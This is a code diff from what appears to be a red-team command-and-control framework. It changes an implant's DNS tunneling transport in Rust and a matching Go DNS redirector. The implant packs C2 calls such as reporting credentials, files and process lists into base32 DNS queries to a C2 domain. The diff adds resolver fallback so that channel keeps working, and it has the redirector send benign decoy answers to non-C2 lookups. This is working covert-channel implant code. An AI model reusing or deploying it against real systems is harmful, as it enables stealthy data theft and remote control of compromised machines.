a/implants/lib/transport/src/dns.rs +++ b/implants/lib/transport/src/dns.rs @@ -4,6 +4,9 @@ use prost::Message; use std::sync::mpsc::{Receiver, Sender}; use tokio::net::UdpSocket; +#[cfg(feature = "dns")] +use hickory_resolver::system_conf::read_system_conf; + use crate::Transport; // DNS protocol limits @@ -40,8 +43,10 @@ const RESP_CHUNKED: &str = "r:"; // Response chunked metadata const MAX_RETRIES: usize = 5; const INIT_TIMEOUT_SECS: u64 = 15; const CHUNK_TIMEOUT_SECS: u64 = 20; -const EXCHANGE_MAX_RETRIES: usize = 5; -const EXCHANGE_RETRY_DELAY_SECS: u64 = 3; + +// DNS query configuration +const MAX_DNS_PACKET_SIZE: usize = 
4096; // Maximum DNS response size +const DNS_QUERY_TIMEOUT_SECS: u64 = 5; // Timeout for individual DNS queries // gRPC method paths static CLAIM_TASKS_PATH: &str = "/c2.C2/ClaimTasks"; @@ -67,6 +72,52 @@ where pb::xchacha::decode_with_chacha::(data) } +/// Build resolver array: system DNS servers (if available) + fallback servers +/// Returns array with system servers first, then 1.1.1.1:53, then 8.8.8.8:53 +/// If system config fails, returns only [1.1.1.1:53, 8.8.8.8:53] +fn build_resolver_array() -> Vec { + let mut resolvers = Vec::new(); + + // Try to get system DNS servers + #[cfg(feature = "dns")] + match read_system_conf() { + Ok((config, _opts)) => { + // Extract nameserver addresses from system config + for ns in config.name_servers() { + let addr = ns.socket_addr; + let server = format!("{}:{}", addr.ip(), addr.port()); + + // Only add if not already in the list (deduplicate) + if !resolvers.contains(&server) { + resolvers.push(server); + } + } + + #[cfg(debug_assertions)] + if !resolvers.is_empty() { + log::debug!("Found {} system DNS servers: {:?}", resolvers.len(), resolvers); + } else { + log::debug!("System DNS config returned no servers"); + } + } + Err(_e) => { + #[cfg(debug_assertions)] + log::debug!("Failed to read system DNS config: {}", _e); + } + } + + // Always add fallback servers (Cloudflare and Google) + // Add only if not already in the list + let fallbacks = vec!["1.1.1.1:53".to_string(), "8.8.8.8:53".to_string()]; + for fallback in fallbacks { + if !resolvers.contains(&fallback) { + resolvers.push(fallback); + } + } + + resolvers +} + /// Map gRPC method path to 2-character code /// Codes: ct=ClaimTasks, fa=FetchAsset, rc=ReportCredential, /// rf=ReportFile, rp=ReportProcessList, rt=ReportTaskOutput @@ -89,7 +140,9 @@ fn method_to_code(method: &str) -> String { /// Supports TXT, A, and AAAA record types with automatic fallback. 
#[derive(Debug, Clone)] pub struct DNS { - dns_server: Option, // None = use system resolver + dns_server: Option, // Some(server) = use explicit server, None = use resolver array + dns_resolvers: Vec, // Array of resolvers (system + fallbacks) when dns_server is None + current_resolver_index: usize, // Current index in dns_resolvers array base_domain: String, socket: Option>, preferred_record_type: u16, // User's preferred type (TXT/A/AAAA) @@ -105,9 +158,15 @@ impl DNS { let base_with_dot = self.base_domain.len() + 1; let total_available = MAX_DNS_NAME_LEN.saturating_sub(base_with_dot); - // Base32 encoding: ((HEADER_SIZE + data) * 8 / 5) <= total_available - // Solve for data: data <= (total_available * 5 / 8) - HEADER_SIZE - let max_raw_packet = (total_available * 5) / 8; + // Account for dots between labels (every 63 chars needs a dot separator) + // If we have N chars, we need ceil(N/63) - 1 dots + // To be safe, estimate: for every 63 chars, we lose 1 char to a dot + // So effective available space is: total_available * 63 / 64 + let effective_available = (total_available * 63) / 64; + + // Base32 encoding: ((HEADER_SIZE + data) * 8 / 5) <= effective_available + // Solve for data: data <= (effective_available * 5 / 8) - HEADER_SIZE + let max_raw_packet = (effective_available * 5) / 8; max_raw_packet.saturating_sub(HEADER_SIZE) } @@ -404,6 +463,7 @@ impl DNS { } /// Send a single DNS query and receive response, with record type fallback + /// and resolver fallback (when using system resolvers) async fn send_query(&mut self, subdomain: &str) -> Result> { use rand::Rng; @@ -441,89 +501,156 @@ impl DNS { log::trace!("Attempting DNS query with record type: {}", type_name); } - // Generate random transaction ID - let transaction_id: u16 = rand::thread_rng().gen(); - let query = self.build_dns_query(subdomain, transaction_id, record_type); - - // Determine DNS server to use - let target = if let Some(ref server) = self.dns_server { - server.clone() + // If using 
system resolver, try all resolvers in the array + // If using explicit server, only try that one + let resolvers_to_try: Vec = if let Some(ref server) = self.dns_server { + // Explicit DNS server specified + vec![server.clone()] } else { - // Use system resolver - send to localhost:53 - "127.0.0.1:53".to_string() - }; + // Use resolver array (system + fallbacks) + if self.dns_resolvers.is_empty() { + return Err(anyhow::anyhow!("No DNS resolvers available")); + } - // Send query - match socket.send_to(&query, &target).await { - Ok(_) => {} - Err(e) => { - #[cfg(debug_assertions)] - log::trace!("Failed to send query: {}", e); - continue; // Try next record type + // Try all resolvers starting from current index + let mut resolvers = Vec::new(); + for i in 0..self.dns_resolvers.len() { + let idx = (self.current_resolver_index + i) % self.dns_resolvers.len(); + resolvers.push(self.dns_resolvers[idx].clone()); } - } + resolvers + }; - // Receive response(s) until we get one with matching transaction ID - let deadline = tokio::time::Instant::now() + tokio::time::Duration::from_secs(5); - let mut buf = [0u8; 4096]; + // Try each resolver + for (resolver_attempt, target) in resolvers_to_try.iter().enumerate() { + #[cfg(debug_assertions)] + log::trace!( + "Attempting query to resolver {} (attempt {}/{})", + target, + resolver_attempt + 1, + resolvers_to_try.len() + ); - loop { - let remaining = deadline.saturating_duration_since(tokio::time::Instant::now()); - if remaining.is_zero() { - // Timeout - try next record type - break; + // Generate random transaction ID + let transaction_id: u16 = rand::thread_rng().gen(); + let query = self.build_dns_query(subdomain, transaction_id, record_type); + + // Send query + match socket.send_to(&query, target).await { + Ok(_) => {} + Err(_e) => { + #[cfg(debug_assertions)] + log::trace!("Failed to send query to {}: {}", target, _e); + + // If using resolver array, advance to next resolver + if self.dns_server.is_none() && 
!self.dns_resolvers.is_empty() { + self.current_resolver_index = + (self.current_resolver_index + 1) % self.dns_resolvers.len(); + } + continue; // Try next resolver + } } - match tokio::time::timeout(remaining, socket.recv_from(&mut buf)).await { - Ok(Ok((len, _))) => { - // Check if transaction ID matches - if len >= 2 { - let response_id = u16::from_be_bytes([buf[0], buf[1]]); - if response_id == transaction_id { - // Check for DNS error (RCODE in flags) - if len >= 4 { - let rcode = buf[3] & 0x0F; // Last 4 bits of flags - if rcode != 0 { - // DNS error response - try next record type - #[cfg(debug_assertions)] - log::trace!("DNS error response, RCODE={}", rcode); - break; - } - } + // Receive response(s) until we get one with matching transaction ID + let deadline = tokio::time::Instant::now() + tokio::time::Duration::from_secs(DNS_QUERY_TIMEOUT_SECS); + let mut buf = [0u8; MAX_DNS_PACKET_SIZE]; + let mut timed_out = false; + + loop { + let remaining = deadline.saturating_duration_since(tokio::time::Instant::now()); + if remaining.is_zero() { + // Timeout - try next resolver or record type + timed_out = true; + break; + } - // Matching response found - match self.parse_dns_response(&buf[..len]) { - Ok(data) => { - // Accept both empty and non-empty responses - // (data packets return empty ACK, others return data) - self.current_record_type = record_type; - return Ok(data); + match tokio::time::timeout(remaining, socket.recv_from(&mut buf)).await { + Ok(Ok((len, _))) => { + // Check if transaction ID matches + if len >= 2 { + let response_id = u16::from_be_bytes([buf[0], buf[1]]); + if response_id == transaction_id { + // Check for DNS error (RCODE in flags) + if len >= 4 { + let rcode = buf[3] & 0x0F; // Last 4 bits of flags + if rcode != 0 { + // DNS error response - try next resolver + #[cfg(debug_assertions)] + log::trace!( + "DNS error response from {}, RCODE={}", + target, + rcode + ); + break; + } } - Err(_) => { - break; + + // Matching response found 
+ match self.parse_dns_response(&buf[..len]) { + Ok(data) => { + // Accept both empty and non-empty responses + // (data packets return empty ACK, others return data) + self.current_record_type = record_type; + + #[cfg(debug_assertions)] + log::trace!("Successful response from {}", target); + + return Ok(data); + } + Err(_e) => { + #[cfg(debug_assertions)] + log::trace!( + "Failed to parse response from {}: {}", + target, + _e + ); + break; + } } } + // Wrong transaction ID - keep waiting for the right one + #[cfg(debug_assertions)] + log::trace!( + "Ignoring DNS response with mismatched transaction ID: expected {}, got {}", + transaction_id, + response_id + ); } - // Wrong transaction ID - keep waiting for the right one + } + Ok(Err(_e)) => { #[cfg(debug_assertions)] - log::trace!("Ignoring DNS response with mismatched transaction ID: expected {}, got {}", transaction_id, response_id); + log::trace!("Failed to receive response from {}: {}", target, _e); + break; // Try next resolver + } + Err(_) => { + // Timeout - try next resolver + timed_out = true; + break; } } - Ok(Err(e)) => { - #[cfg(debug_assertions)] - log::trace!("Failed to receive response: {}", e); - break; // Try next record type - } - Err(_) => { - // Timeout - try next record type - break; - } + } + + // If we timed out or got an error, advance to next resolver in array + if (timed_out || resolver_attempt < resolvers_to_try.len() - 1) + && self.dns_server.is_none() + && !self.dns_resolvers.is_empty() + { + self.current_resolver_index = + (self.current_resolver_index + 1) % self.dns_resolvers.len(); + + #[cfg(debug_assertions)] + log::trace!( + "Moving to next resolver, now at index {}", + self.current_resolver_index + ); } } } - // All record types failed - Err(anyhow::anyhow!("All DNS record types failed")) + // All record types and resolvers failed + Err(anyhow::anyhow!( + "All DNS record types and resolvers failed" + )) } /// Send init packet and receive conversation ID from server @@ -578,7 
+705,7 @@ impl DNS { // Binary chunked indicator format (for A records): // Byte 0: 0xFF (magic) // Bytes 1-2: chunk count (uint16 big-endian) - // Byte 3: CRC low byte + // Byte 3: CRC low byte - for integrity check, only low byte is used due to size constraints let total_chunks = u16::from_be_bytes([response[1], response[2]]) as usize; let crc_low = response[3]; @@ -725,12 +852,12 @@ impl DNS { attempt + 1 ); } - Ok(Err(e)) => { + Ok(Err(_e)) => { #[cfg(debug_assertions)] log::warn!( "Init packet attempt {}: send_query failed: {}", attempt + 1, - e + _e ); } Err(_) => { @@ -832,7 +959,7 @@ impl DNS { // Binary chunked indicator format (for A records): // Byte 0: 0xFF (magic) // Bytes 1-2: chunk count (uint16 big-endian) - // Byte 3: CRC low byte + // Byte 3: CRC low byte - for integrity check, only low byte is used due to size constraints let total_chunks = u16::from_be_bytes([response[1], response[2]]) as usize; let crc_low = response[3]; @@ -1045,58 +1172,8 @@ impl DNS { Ok(decoded) } - /// Perform a complete request-response cycle via DNS - /// Perform a DNS-based RPC exchange with automatic retry on failure + /// Perform a DNS-based RPC exchange async fn dns_exchange(&mut self, method: &str, data: &[u8]) -> Result> { - let mut last_error = None; - - for attempt in 0..EXCHANGE_MAX_RETRIES { - match self.dns_exchange_attempt(method, data).await { - Ok(response) => { - #[cfg(debug_assertions)] - if attempt > 0 { - log::info!( - "DNS exchange succeeded on attempt {}/{}", - attempt + 1, - EXCHANGE_MAX_RETRIES - ); - } - return Ok(response); - } - Err(e) => { - #[cfg(debug_assertions)] - log::warn!( - "DNS exchange attempt {}/{} failed: {}", - attempt + 1, - EXCHANGE_MAX_RETRIES, - e - ); - - last_error = Some(e); - - if attempt < EXCHANGE_MAX_RETRIES - 1 { - // Exponential backoff: 3s, 6s, 12s, 24s - let delay = EXCHANGE_RETRY_DELAY_SECS * (1 << attempt); - - #[cfg(debug_assertions)] - log::info!("Retrying DNS exchange in {} seconds...", delay); - - 
tokio::time::sleep(tokio::time::Duration::from_secs(delay)).await; - } - } - } - } - - Err(last_error.unwrap_or_else(|| { - anyhow::anyhow!( - "DNS exchange failed after {} attempts", - EXCHANGE_MAX_RETRIES - ) - })) - } - - /// Internal implementation of DNS exchange (single attempt) - async fn dns_exchange_attempt(&mut self, method: &str, data: &[u8]) -> Result> { // Lazy initialize socket if self.socket.is_none() { let socket = UdpSocket::bind("0.0.0.0:0") @@ -1169,6 +1246,8 @@ impl Transport for DNS { fn init() -> Self { DNS { dns_server: None, + dns_resolvers: Vec::new(), + current_resolver_index: 0, base_domain: String::new(), socket: None, preferred_record_type: TXT_RECORD_TYPE, @@ -1250,8 +1329,17 @@ impl Transport for DNS { } } + // Build resolver array if using system resolver (dns_server is None) + let dns_resolvers = if dns_server.is_none() { + build_resolver_array() + } else { + Vec::new() + }; + Ok(DNS { dns_server, + dns_resolvers, + current_resolver_index: 0, base_domain, socket: None, preferred_record_type, @@ -1345,11 +1433,15 @@ impl Transport for DNS { // This is necessary because iterating over the sync receiver would block the async task let handle = tokio::spawn(async move { let mut all_chunks = Vec::new(); + #[cfg_attr(not(debug_assertions), allow(unused_variables))] let mut chunk_count = 0; // Iterate over the sync channel receiver in a spawned task to avoid blocking for chunk in request { - chunk_count += 1; + #[cfg(debug_assertions)] + { + chunk_count += 1; + } let chunk_bytes = marshal_with_codec::(chunk)?; all_chunks.extend_from_slice(&(chunk_bytes.len() as u32).to_be_bytes()); @@ -1461,6 +1553,8 @@ mod tests { fn test_calculate_max_data_size_positive() { let dns = DNS { dns_server: None, + dns_resolvers: Vec::new(), + current_resolver_index: 0, base_domain: "c2.example.com".to_string(), socket: None, preferred_record_type: TXT_RECORD_TYPE, @@ -1474,6 +1568,8 @@ mod tests { // Test with a very long base domain - should be smaller let 
dns_long = DNS { dns_server: None, + dns_resolvers: Vec::new(), + current_resolver_index: 0, base_domain: "very.long.subdomain.hierarchy.for.testing.purposes.c2.example.com" .to_string(), socket: None, @@ -1624,4 +1720,35 @@ mod tests { let err_msg = result.unwrap_err().to_string(); assert!(err_msg.contains("reverse shell") || err_msg.contains("not support")); } + + #[test] + fn test_dns_new_with_wildcard_builds_resolver_array() { + let dns = DNS::new("dns://*/c2.example.com".to_string(), None).unwrap(); + + assert!(dns.dns_server.is_none(), "dns_server should be None for wildcard"); + assert!(!dns.dns_resolvers.is_empty(), "dns_resolvers array should be populated"); + + // Should always have at least Cloudflare and Google fallbacks + assert!(dns.dns_resolvers.len() >= 2, "Should have at least 2 resolvers (fallbacks)"); + + // Check that Cloudflare and Google are in the list (they should be at the end) + let has_cloudflare = dns.dns_resolvers.iter().any(|s| s == "1.1.1.1:53"); + let has_google = dns.dns_resolvers.iter().any(|s| s == "8.8.8.8:53"); + + assert!(has_cloudflare, "Should have Cloudflare (1.1.1.1:53) in resolver list"); + assert!(has_google, "Should have Google (8.8.8.8:53) in resolver list"); + + assert_eq!(dns.current_resolver_index, 0, "Should start at index 0"); + + #[cfg(debug_assertions)] + println!("Resolver array: {:?}", dns.dns_resolvers); + } + + #[test] + fn test_dns_new_with_explicit_server_no_resolver_array() { + let dns = DNS::new("dns://8.8.8.8/c2.example.com".to_string(), None).unwrap(); + + assert_eq!(dns.dns_server, Some("8.8.8.8:53".to_string())); + assert!(dns.dns_resolvers.is_empty(), "dns_resolvers should be empty with explicit server"); + } } diff --git a/tavern/internal/redirectors/dns/dns.go b/tavern/internal/redirectors/dns/dns.go index 804c750b6..26702282b 100644 --- a/tavern/internal/redirectors/dns/dns.go +++ b/tavern/internal/redirectors/dns/dns.go @@ -241,6 +241,9 @@ func (r *Redirector) handleDNSQuery(ctx context.Context, 
conn *net.UDPConn, addr return } + // Normalize domain to lowercase for case-insensitive matching + domain = strings.ToLower(domain) + slog.Debug("received DNS query", "domain", domain, "query_type", queryType, "from", addr.String()) domainParts := strings.Split(domain, ".") @@ -288,6 +291,13 @@ func (r *Redirector) handleDNSQuery(ctx context.Context, conn *net.UDPConn, addr // Decode base32 to get raw packet bytes packetBytes, err := decodeBase32(fullSubdomain) if err != nil { + // For A/AAAA queries, this is likely a DNS resolver doing lookups (not C2 traffic) + // Return a benign response instead of an error to avoid polluting logs + if queryType == aRecordType || queryType == aaaaRecordType { + slog.Debug("ignoring non-C2 resolver query", "query_type", queryType, "domain", domain) + r.sendBenignResponse(conn, addr, transactionID, domain, queryType) + return + } slog.Debug("failed to decode base32 subdomain", "error", err, "subdomain", fullSubdomain[:min(len(fullSubdomain), 50)]) r.sendErrorResponse(conn, addr, transactionID) return @@ -295,6 +305,12 @@ func (r *Redirector) handleDNSQuery(ctx context.Context, conn *net.UDPConn, addr // Parse packet: [type:1][seq:5][convid:12][data...] 
if len(packetBytes) < headerSize { + // For A/AAAA queries with invalid packet structure, likely resolver lookups + if queryType == aRecordType || queryType == aaaaRecordType { + slog.Debug("ignoring malformed resolver query", "query_type", queryType, "domain", domain, "size", len(packetBytes)) + r.sendBenignResponse(conn, addr, transactionID, domain, queryType) + return + } slog.Debug("packet too short after decoding", "size", len(packetBytes), "min_size", headerSize) r.sendErrorResponse(conn, addr, transactionID) return @@ -309,6 +325,12 @@ func (r *Redirector) handleDNSQuery(ctx context.Context, conn *net.UDPConn, addr seq, err := decodeSeq(seqStr) if err != nil { + // For A/AAAA queries, invalid sequence likely means resolver lookup + if queryType == aRecordType || queryType == aaaaRecordType { + slog.Debug("ignoring resolver query with invalid sequence", "query_type", queryType, "domain", domain) + r.sendBenignResponse(conn, addr, transactionID, domain, queryType) + return + } slog.Debug("invalid sequence", "seq", seqStr, "error", err) r.sendErrorResponse(conn, addr, transactionID) return @@ -505,6 +527,7 @@ func (r *Redirector) HandleDataPacket(convID string, seq int, data []byte) ([]by slog.Debug("received chunk", "conv_id", convID, "seq", seq, "chunk_len", len(data), "total_received", len(conv.Chunks), "expected_total", conv.TotalChunks, "data_preview", dataPreview) + // Return acknowledgment return []byte{}, nil } @@ -906,6 +929,22 @@ func (r *Redirector) sendErrorResponse(conn *net.UDPConn, addr *net.UDPAddr, tra conn.WriteToUDP(response, addr) } +// sendBenignResponse sends a benign DNS response for resolver queries +// Returns 127.0.0.1 for A, ::1 for AAAA, empty TXT for others +func (r *Redirector) sendBenignResponse(conn *net.UDPConn, addr *net.UDPAddr, transactionID uint16, domain string, queryType uint16) { + var data []byte + switch queryType { + case aRecordType: + data = []byte{127, 0, 0, 1} // localhost + case aaaaRecordType: + data = 
make([]byte, 16) // ::1 + data[15] = 1 + default: + data = []byte{} // empty response + } + r.sendDNSResponse(conn, addr, transactionID, domain, data, queryType) +} + // generateConvID generates a random conversation ID func generateConvID() string { const chars = "0123456789abcdefghijklmnopqrstuvwxyz" From dfe0ee8b3c219bbb7729825004b2b8d38ed29a6e Mon Sep 17 00:00:00 2001 From: KaliPatriot <43020092+KaliPatriot@users.noreply.github.com> Date: Fri, 5 Dec 2025 22:52:46 -0600 Subject: [PATCH 04/17] fmt, fixed more hardcoded values --- implants/lib/transport/src/dns.rs | 186 +++++++++++++++++-------- tavern/internal/redirectors/dns/dns.go | 68 ++++++--- 2 files changed, 175 insertions(+), 79 deletions(-) diff --git a/implants/lib/transport/src/dns.rs b/implants/lib/transport/src/dns.rs index b4f496105..a7fcf4ca1 100644 --- a/implants/lib/transport/src/dns.rs +++ b/implants/lib/transport/src/dns.rs @@ -48,6 +48,50 @@ const CHUNK_TIMEOUT_SECS: u64 = 20; const MAX_DNS_PACKET_SIZE: usize = 4096; // Maximum DNS response size const DNS_QUERY_TIMEOUT_SECS: u64 = 5; // Timeout for individual DNS queries +// DNS server configuration +const DEFAULT_DNS_PORT: &str = "53"; +const FALLBACK_DNS_CLOUDFLARE: &str = "1.1.1.1"; +const FALLBACK_DNS_GOOGLE: &str = "8.8.8.8"; + +// Base36 encoding math constants (for sequence and CRC encoding) +const BASE36_RADIX: usize = 36; +const BASE36_POW_2: usize = 1296; // 36^2 +const BASE36_POW_3: usize = 46656; // 36^3 +const BASE36_POW_4: usize = 1679616; // 36^4 + +// CRC16-CCITT constants +const CRC16_INIT: u16 = 0xFFFF; +const CRC16_POLYNOMIAL: u16 = 0x1021; +const CRC16_HIGH_BIT: u16 = 0x8000; +const CRC16_LOW_BYTE_MASK: u16 = 0xFF; + +// DNS protocol constants +const DNS_QUERY_FLAG_STANDARD: [u8; 2] = [0x01, 0x00]; +const DNS_COMPRESSION_PTR_MASK: u8 = 0xC0; +const DNS_RCODE_MASK: u8 = 0x0F; + +// Retry and timing constants +const MAX_MISSING_CHUNK_RETRIES: usize = 5; +const MAX_CHUNKED_INDICATOR_FETCHES: usize = 10; +const 
MISSING_CHUNK_DELAY_MS: u64 = 50; +const BACKOFF_BASE_SECS: u64 = 1; +const BACKOFF_RETRY_DELAY_SECS: u64 = 2; + +// Label size calculation constants +const DNS_LABEL_OVERHEAD_DIVISOR: usize = 64; +const DNS_LABEL_USABLE_RATIO: usize = 63; + +// Base32 encoding ratio (8 bits to 5 bits, so 8/5 expansion) +const BASE32_ENCODE_NUMERATOR: usize = 8; +const BASE32_ENCODE_DENOMINATOR: usize = 5; + +// Binary chunking indicator +const BINARY_CHUNK_MAGIC: u8 = 0xFF; + +// URL parsing constants +const URL_SCHEME_PREFIX: &str = "dns://"; +const SYSTEM_RESOLVER_WILDCARD: &str = "*"; + // gRPC method paths static CLAIM_TASKS_PATH: &str = "/c2.C2/ClaimTasks"; static FETCH_ASSET_PATH: &str = "/c2.C2/FetchAsset"; @@ -95,7 +139,11 @@ fn build_resolver_array() -> Vec { #[cfg(debug_assertions)] if !resolvers.is_empty() { - log::debug!("Found {} system DNS servers: {:?}", resolvers.len(), resolvers); + log::debug!( + "Found {} system DNS servers: {:?}", + resolvers.len(), + resolvers + ); } else { log::debug!("System DNS config returned no servers"); } @@ -108,7 +156,10 @@ fn build_resolver_array() -> Vec { // Always add fallback servers (Cloudflare and Google) // Add only if not already in the list - let fallbacks = vec!["1.1.1.1:53".to_string(), "8.8.8.8:53".to_string()]; + let fallbacks = vec![ + format!("{}:{}", FALLBACK_DNS_CLOUDFLARE, DEFAULT_DNS_PORT), + format!("{}:{}", FALLBACK_DNS_GOOGLE, DEFAULT_DNS_PORT), + ]; for fallback in fallbacks { if !resolvers.contains(&fallback) { resolvers.push(fallback); @@ -140,9 +191,9 @@ fn method_to_code(method: &str) -> String { /// Supports TXT, A, and AAAA record types with automatic fallback. 
#[derive(Debug, Clone)] pub struct DNS { - dns_server: Option, // Some(server) = use explicit server, None = use resolver array - dns_resolvers: Vec, // Array of resolvers (system + fallbacks) when dns_server is None - current_resolver_index: usize, // Current index in dns_resolvers array + dns_server: Option, // Some(server) = use explicit server, None = use resolver array + dns_resolvers: Vec, // Array of resolvers (system + fallbacks) when dns_server is None + current_resolver_index: usize, // Current index in dns_resolvers array base_domain: String, socket: Option>, preferred_record_type: u16, // User's preferred type (TXT/A/AAAA) @@ -162,11 +213,13 @@ impl DNS { // If we have N chars, we need ceil(N/63) - 1 dots // To be safe, estimate: for every 63 chars, we lose 1 char to a dot // So effective available space is: total_available * 63 / 64 - let effective_available = (total_available * 63) / 64; + let effective_available = + (total_available * DNS_LABEL_USABLE_RATIO) / DNS_LABEL_OVERHEAD_DIVISOR; // Base32 encoding: ((HEADER_SIZE + data) * 8 / 5) <= effective_available // Solve for data: data <= (effective_available * 5 / 8) - HEADER_SIZE - let max_raw_packet = (effective_available * 5) / 8; + let max_raw_packet = + (effective_available * BASE32_ENCODE_DENOMINATOR) / BASE32_ENCODE_NUMERATOR; max_raw_packet.saturating_sub(HEADER_SIZE) } @@ -180,11 +233,11 @@ impl DNS { fn encode_seq(seq: usize) -> String { const BASE36: &[u8] = b"0123456789abcdefghijklmnopqrstuvwxyz"; - let digit4 = (seq / 1679616) % 36; // 36^4 - let digit3 = (seq / 46656) % 36; // 36^3 - let digit2 = (seq / 1296) % 36; // 36^2 - let digit1 = (seq / 36) % 36; // 36^1 - let digit0 = seq % 36; // 36^0 + let digit4 = (seq / BASE36_POW_4) % BASE36_RADIX; + let digit3 = (seq / BASE36_POW_3) % BASE36_RADIX; + let digit2 = (seq / BASE36_POW_2) % BASE36_RADIX; + let digit1 = (seq / BASE36_RADIX) % BASE36_RADIX; + let digit0 = seq % BASE36_RADIX; format!( "{}{}{}{}{}", BASE36[digit4] as char, @@ 
-212,21 +265,21 @@ impl DNS { } }; - Ok(val(chars[0])? * 1679616 - + val(chars[1])? * 46656 - + val(chars[2])? * 1296 - + val(chars[3])? * 36 + Ok(val(chars[0])? * BASE36_POW_4 + + val(chars[1])? * BASE36_POW_3 + + val(chars[2])? * BASE36_POW_2 + + val(chars[3])? * BASE36_RADIX + val(chars[4])?) } - /// Calculate CRC16-CCITT checksum (polynomial 0x1021, init 0xFFFF) + /// Calculate CRC16-CCITT checksum fn calculate_crc16(data: &[u8]) -> u16 { - let mut crc: u16 = 0xFFFF; + let mut crc: u16 = CRC16_INIT; for byte in data { crc ^= (*byte as u16) << 8; for _ in 0..8 { - if (crc & 0x8000) != 0 { - crc = (crc << 1) ^ 0x1021; + if (crc & CRC16_HIGH_BIT) != 0 { + crc = (crc << 1) ^ CRC16_POLYNOMIAL; } else { crc <<= 1; } @@ -239,10 +292,10 @@ impl DNS { fn encode_base36_crc(crc: u16) -> String { const BASE36: &[u8] = b"0123456789abcdefghijklmnopqrstuvwxyz"; let crc_val = crc as usize; - let digit3 = (crc_val / 46656) % 36; // 36^3 - let digit2 = (crc_val / 1296) % 36; // 36^2 - let digit1 = (crc_val / 36) % 36; // 36^1 - let digit0 = crc_val % 36; // 36^0 + let digit3 = (crc_val / BASE36_POW_3) % BASE36_RADIX; + let digit2 = (crc_val / BASE36_POW_2) % BASE36_RADIX; + let digit1 = (crc_val / BASE36_RADIX) % BASE36_RADIX; + let digit0 = crc_val % BASE36_RADIX; format!( "{}{}{}{}", BASE36[digit3] as char, @@ -270,8 +323,10 @@ impl DNS { } }; - let crc = - val(chars[0])? * 46656 + val(chars[1])? * 1296 + val(chars[2])? * 36 + val(chars[3])?; + let crc = val(chars[0])? * BASE36_POW_3 + + val(chars[1])? * BASE36_POW_2 + + val(chars[2])? 
* BASE36_RADIX + + val(chars[3])?; Ok(crc as u16) } @@ -354,7 +409,7 @@ impl DNS { // DNS Header (12 bytes) query.extend_from_slice(&transaction_id.to_be_bytes()); // Transaction ID - query.extend_from_slice(&[0x01, 0x00]); // Flags: Standard query + query.extend_from_slice(&DNS_QUERY_FLAG_STANDARD); // Flags: Standard query query.extend_from_slice(&[0x00, 0x01]); // Questions: 1 query.extend_from_slice(&[0x00, 0x00]); // Answer RRs: 0 query.extend_from_slice(&[0x00, 0x00]); // Authority RRs: 0 @@ -417,7 +472,7 @@ impl DNS { if b == 0 { offset += 1; break; - } else if (b & 0xC0) == 0xC0 { + } else if (b & DNS_COMPRESSION_PTR_MASK) == DNS_COMPRESSION_PTR_MASK { // Pointer offset += 2; break; @@ -552,7 +607,8 @@ impl DNS { } // Receive response(s) until we get one with matching transaction ID - let deadline = tokio::time::Instant::now() + tokio::time::Duration::from_secs(DNS_QUERY_TIMEOUT_SECS); + let deadline = tokio::time::Instant::now() + + tokio::time::Duration::from_secs(DNS_QUERY_TIMEOUT_SECS); let mut buf = [0u8; MAX_DNS_PACKET_SIZE]; let mut timed_out = false; @@ -572,7 +628,7 @@ impl DNS { if response_id == transaction_id { // Check for DNS error (RCODE in flags) if len >= 4 { - let rcode = buf[3] & 0x0F; // Last 4 bits of flags + let rcode = buf[3] & DNS_RCODE_MASK; // Last 4 bits of flags if rcode != 0 { // DNS error response - try next resolver #[cfg(debug_assertions)] @@ -648,9 +704,7 @@ impl DNS { } // All record types and resolvers failed - Err(anyhow::anyhow!( - "All DNS record types and resolvers failed" - )) + Err(anyhow::anyhow!("All DNS record types and resolvers failed")) } /// Send init packet and receive conversation ID from server @@ -700,8 +754,8 @@ impl DNS { .await { Ok(Ok(response)) if !response.is_empty() => { - // Check if response is binary chunked indicator (magic byte 0xFF) - if response.len() >= 4 && response[0] == 0xFF { + // Check if response is binary chunked indicator + if response.len() >= 4 && response[0] == BINARY_CHUNK_MAGIC 
{ // Binary chunked indicator format (for A records): // Byte 0: 0xFF (magic) // Bytes 1-2: chunk count (uint16 big-endian) @@ -754,8 +808,8 @@ impl DNS { let mut full_indicator = response_str.clone(); let mut fetch_seq = 0; - // Try up to 10 fetches to get the full indicator - while fetch_seq < 10 { + // Try up to MAX_CHUNKED_INDICATOR_FETCHES to get the full indicator + while fetch_seq < MAX_CHUNKED_INDICATOR_FETCHES { let subdomain = self.build_packet(TYPE_FETCH, fetch_seq, &temp_conv_id, &[])?; match self.send_query(&subdomain).await { @@ -871,7 +925,7 @@ impl DNS { } if attempt < MAX_RETRIES - 1 { - let delay = 1 << attempt; // Exponential backoff: 1s, 2s, 4s, 8s, 16s + let delay = BACKOFF_BASE_SECS << attempt; // Exponential backoff: 1s, 2s, 4s, 8s, 16s #[cfg(debug_assertions)] log::debug!("Waiting {}s before retry...", delay); tokio::time::sleep(tokio::time::Duration::from_secs(delay)).await; @@ -932,7 +986,10 @@ impl DNS { } _ => { if attempt < MAX_RETRIES - 1 { - tokio::time::sleep(tokio::time::Duration::from_secs(2)).await; + tokio::time::sleep(tokio::time::Duration::from_secs( + BACKOFF_RETRY_DELAY_SECS, + )) + .await; } } } @@ -952,10 +1009,8 @@ impl DNS { chunks: &[Vec], retry_count: usize, ) -> Result> { - const MAX_MISSING_CHUNK_RETRIES: usize = 5; - - // Check if response is binary chunked indicator (magic byte 0xFF) - if response.len() >= 4 && response[0] == 0xFF { + // Check if response is binary chunked indicator + if response.len() >= 4 && response[0] == BINARY_CHUNK_MAGIC { // Binary chunked indicator format (for A records): // Byte 0: 0xFF (magic) // Bytes 1-2: chunk count (uint16 big-endian) @@ -1027,7 +1082,7 @@ impl DNS { } // Small delay to let resent chunks arrive before sending end packet again - tokio::time::sleep(tokio::time::Duration::from_millis(50)).await; + tokio::time::sleep(tokio::time::Duration::from_millis(MISSING_CHUNK_DELAY_MS)).await; // Retry end packet let last_seq = chunks.len().saturating_sub(1); @@ -1147,7 +1202,7 @@ 
